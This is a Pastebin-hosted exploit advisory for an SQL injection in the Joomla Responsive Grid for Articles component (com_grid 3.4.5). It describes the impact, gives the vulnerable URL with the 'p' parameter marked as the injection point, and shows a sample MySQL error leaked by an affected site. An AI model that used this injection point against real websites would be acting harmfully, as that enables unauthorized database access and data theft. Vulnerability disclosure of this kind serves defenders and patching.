Advertisement
KingSkrupellos

Joomla Responsive Grid for Articles Com_Grid 3.4.5 SQL Inj

Feb 24th, 2019
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
  1. ###############################################################################
  2.  
  3. # Exploit Title : Joomla Responsive Grid for Articles Com_Grid Components 3.4.5 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/02/2019
  7. # Vendor Homepage : toolsjx.web-help.me ~ minitek.gr
  8. # Software Information Link : minitek.gr/joomla/extensions/responsive-grid-for-articles
  9. # Software Version : 3.4.2 and 3.4.5 other previous versions
  10. # Software Price Type : Paid Download
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ###############################################################################
  21.  
  22. # Description about Software :
  23. ***************************
  24. A powerful module that provides beautiful animated filtering and sorting of Joomla articles.
  25.  
  26. ###############################################################################
  27.  
  28. # Impact :
  29. ***********
  30. Joomla Responsive Grid for Articles Com_Grid Components 3.4.5 [ and other versions ]
  31.  
  32. component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently
  33.  
  34. sanitize user-supplied data before using it in an SQL query.
  35.  
  36. Exploiting this issue could allow an attacker to compromise the application, access
  37.  
  38. or modify data, or exploit latent vulnerabilities in the underlying database.
  39.  
  40. A remote attacker can send a specially crafted request
  41.  
  42. to the vulnerable application and execute arbitrary SQL commands in application`s database.
  43.  
  44. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  45.  
  46. An attacker can exploit this issue using a browser.
  47.  
  48. ###############################################################################
  49.  
  50. # SQL Injection Exploit :
  51. **********************
  52. /index.php?option=com_grid&gid=110uk_0&p=[SQL Injection]
  53.  
  54. ###############################################################################
  55.  
  56. # Example SQL Database Error :
  57. ****************************
  58. Error:1064-You have an error in your SQL syntax; check the manual that corresponds
  59. to your MySQL server version for the right syntax to use near 'FROM `ddp_transparencia_mop
  60. ` ORDER BY `id` ASC LIMIT 3184, 1' at line 1 SQL=SELECT FROM
  61. `ddp_transparencia_mop` ORDER BY `id` ASC LIMIT 3184, 1
  62.  
  63. ###############################################################################
  64.  
  65. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  66.  
  67. ###############################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement